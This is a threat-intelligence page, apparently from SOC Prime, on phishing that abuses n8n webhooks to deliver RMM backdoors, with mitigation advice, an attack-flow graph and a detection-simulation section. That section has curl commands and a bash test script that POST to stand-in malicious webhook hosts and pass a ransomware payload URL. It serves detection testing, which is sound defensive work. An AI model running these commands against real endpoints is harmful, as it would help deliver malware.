Threat Actors Misuse n8n to Automate AI-Driven Attacks

SOC Prime Team

Threat Actors Misuse n8n to Automate AI-Driven Attacks

Detection stack

AIDR
Alert
ETL
Query

Threat Report
Attack Flow
Detections
Simulations

Summary

Threat actors are exploiting the n8n low-code automation platform to distribute malicious payloads and profile email recipients. By embedding harmful webhook URLs in phishing messages, they can deliver executable files or MSI installers that deploy remote access tools on victim systems. The activity also includes the use of invisible tracking pixels that gather victim information as soon as the email is opened. This campaign highlights how a legitimate workflow automation service can be repurposed for malware delivery without requiring stolen credentials.

Investigation

Cisco Talos analyzed a series of phishing campaigns observed between October 2025 and March 2026 that relied on n8n webhook URLs embedded in email messages. The lures used fake OneDrive links that first displayed a CAPTCHA prompt before serving either a malicious .exe or MSI file. Once executed, the payloads installed modified versions of Datto or ITarian RMM tools and created scheduled tasks to maintain persistence. Talos also found fingerprinting activity through image tags that called n8n webhook URLs containing victim-specific identifiers.

Mitigation

Organizations should monitor for unusual outbound traffic to n8n-related domains from systems that would not normally use automation services and inspect for suspicious webhook URL patterns. URLs resolving to unknown subdomains of n8n.cloud should be blocked or detonated in a sandbox before user access is allowed. Email security controls should also be tuned to detect malicious HTML content, fake CAPTCHA flows, and hidden tracking pixels. Relevant IOCs, including webhook URLs and malicious file hashes, should be shared with threat intelligence platforms and internal defenders.

Response

Security teams should alert on the presence of n8n webhook URLs in email content or network telemetry and isolate any impacted hosts as soon as suspicious activity is confirmed. Any installed RMM tools and related scheduled tasks should be removed, followed by forensic analysis to uncover additional persistence or follow-on payloads. Firewall and proxy policies should be updated to restrict access to unauthorized n8n endpoints. Organizations should also complete a full IOC-sharing process across internal teams and trusted external partners.

"graph TB %% Class Definitions classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef malware fill:#ff9999 classDef process fill:#ccccff %% Nodes action_phishing["Action – T1566 Phishing: Threat actors send malicious emails containing n8n webhook URLs to lure victims. Description: Phishing attempts to deliver malicious content via email."] class action_phishing action tool_webhook["Tool – Name: n8n webhook Description: Custom web endpoint used to deliver payloads."] class tool_webhook tool action_user_execution["Action – T1204.001 User Execution: Malicious Link: Victim clicks the webhook link, causing the browser to request the URL. Description: User interacts with malicious content."] class action_user_execution action action_exfil_webhook1["Action – T1567.004 Exfiltration Over Webhook: Webhook returns a malicious HTML page with a CAPTCHA and streams a payload (EXE or MSI) while serving tracking pixels. Description: Uses a web service to deliver and exfiltrate data."] class action_exfil_webhook1 action malware_payload_exe["Malware – Name: Payload EXE/MSI Description: Executable that runs PowerShell to install a modified RMM tool."] class malware_payload_exe malware action_powershell["Action – T1059.001 PowerShell: Downloaded executable runs PowerShell commands to configure and install the modified RMM tool. Description: Command and scripting interpreter."] class action_powershell action malware_rmm["Malware – Name: Modified RMM backdoor Description: Remote monitoring and management tool used for persistence."] class malware_rmm malware action_service_execution["Action – T1569.002 Service Execution: RMM tool is installed as a Windows service for persistence. Description: Executes via a system service."] class action_service_execution action action_scheduled_task["Action – T1053 Scheduled Task/Job: A scheduled task is created to ensure the RMM tool runs persistently. Description: Ensures recurring execution."] class action_scheduled_task action action_msi_execution["Action – T1218.007 Msiexec: Malicious MSI is executed via msiexec to deploy the RMM backdoor. Description: System binary proxy execution."] class action_msi_execution action action_exfil_webhook2["Action – T1567.004 Exfiltration Over Webhook: Invisible tracking pixel loads the webhook to capture email open events and device information for reconnaissance."] class action_exfil_webhook2 action %% Connections action_phishing –>|delivers| tool_webhook tool_webhook –>|triggers| action_user_execution action_user_execution –>|leads to| action_exfil_webhook1 action_exfil_webhook1 –>|delivers| malware_payload_exe malware_payload_exe –>|executes| action_powershell action_powershell –>|installs| malware_rmm malware_rmm –>|persists via| action_service_execution action_service_execution –>|creates| action_scheduled_task action_scheduled_task –>|supports| action_msi_execution action_msi_execution –>|deploys| malware_rmm malware_rmm –>|communicates via| action_exfil_webhook2 "

Attack Flow

Attack Narrative & Commands:

An attacker purchases a short‑lived domain that points to n8n.cloud/webhook. They create a malicious n8n workflow that, once triggered, serves a ransomware payload. The phishing email contains a link to a landing page with a CAPTCHA challenge. The victim solves the CAPTCHA, which the attacker’s JavaScript forwards as the value CAPTCHA=solved123 in the HTTP body of a POST request to the webhook. The webhook responds with a PowerShell downloader that executes the payload. This flow generates an HTTP request whose URL contains n8n.cloud/webhook and whose body contains the string CAPTCHA, perfectly matching the Sigma rule.
```
# Step 1 – Victim completes CAPTCHA (simulated)
CAPTCHA_TOKEN="solved123"

# Step 2 – Craft the malicious POST that mimics the victim’s action
curl -X POST "https://my.malicious-n8n.cloud/webhook/malicious-workflow" 
     -H "Content-Type: application/x-www-form-urlencoded" 
     --data-urlencode "CAPTCHA=${CAPTCHA_TOKEN}" 
     --data-urlencode "payload_url=https://malicious.example.com/ransomware.exe"
```

Regression Test Script:

#!/usr/bin/env bash
set -euo pipefail

# Variables – adjust to your test environment
WEBHOOK_HOST="my.malicious-n8n.cloud"
WEBHOOK_PATH="/webhook/malicious-workflow"
CAPTCHA_TOKEN="solved123"
PAYLOAD_URL="https://malicious.example.com/ransomware.exe"

echo "[*] Simulating CAPTCHA‑driven n8n webhook abuse..."

curl -s -o /dev/null -w "%{http_code}n" -X POST "https://${WEBHOOK_HOST}${WEBHOOK_PATH}" 
     -H "Content-Type: application/x-www-form-urlencoded" 
     --data-urlencode "CAPTCHA=${CAPTCHA_TOKEN}" 
     --data-urlencode "payload_url=${PAYLOAD_URL}"

echo "[+] Simulation complete. Verify detection in SIEM."

Cleanup Commands:

# If a real webhook was created for testing, delete it via the n8n UI or API.
# Example API call (replace API_KEY and WORKFLOW_ID):
curl -X DELETE "https://my.malicious-n8n.cloud/webhook/malicious-workflow" 
     -H "Authorization: Bearer API_KEY"

# Remove any temporary files (none created in this script)
echo "[+] Cleanup finished."

Join SOC Prime's Detection as Code platform to improve visibility into threats most relevant to your business. To help you get started and drive immediate value, book a meeting now with SOC Prime experts.

Join for Free